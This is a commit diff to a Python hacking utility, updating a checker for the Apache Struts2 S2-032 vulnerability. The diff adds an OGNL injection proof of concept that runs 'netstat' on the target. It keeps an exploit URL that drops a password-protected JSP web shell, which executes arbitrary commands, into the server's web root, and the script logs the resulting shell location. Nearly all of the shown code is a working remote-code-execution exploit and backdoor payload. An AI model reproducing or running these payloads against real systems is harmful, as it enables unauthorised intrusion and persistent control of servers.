Skip to content

Commit 8822c37

Browse files
author
avfisher
committed
update exp for s2-032
1 parent 430b6cb commit 8822c37

File tree

1 file changed

+11
-6
lines changed

1 file changed

+11
-6
lines changed

hackUtils.py

Lines changed: 11 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -753,23 +753,28 @@ def rceStruts2S2032(value):
753753

754754
def checkS2032(url):
755755
url = url.strip()
756+
if '?' in url:
757+
url = url.split('?')[0]
756758
#reg = 'http[s]*://.*/$'
757759
#m = re.match(reg,url)
758760
#if not m:
759761
# url = url + "/"
762+
763+
poc = url+"?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command[0]%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char[51020]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close&command=netstat"
764+
760765
shellname="nimabi.jsp"
761766
shellpwd="pwd"
762767
exp = url+"?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj="+shellname+"&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22"+shellpwd+"%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E"
763768
try:
764-
result = exploitS2032(exp)
765-
if shellname in result:
766-
document_root = result.strip()
769+
result = exploitS2032(poc)
770+
if "Local Address" in result:
771+
shell_path = exploitS2032(exp).strip()
767772
reg = '(http[s]*://[^/]*/?).*$'
768773
m = re.search(reg,url)
769774
if m:
770-
url=m.group(1)
771-
shell_file = url+shellname
772-
vuls='[+] vuls found! url: '+url+', document_root: '+document_root+', shell_file: '+shell_file
775+
url_path=m.group(1)
776+
shell_file = url_path+shellname
777+
vuls='[+] vuls found! url: '+url+', shell_path: '+ shell_path +', shell_file: '+shell_file
773778
logfile(vuls,'s2032_rce.txt')
774779
print vuls
775780
else:

0 commit comments

Comments
 (0)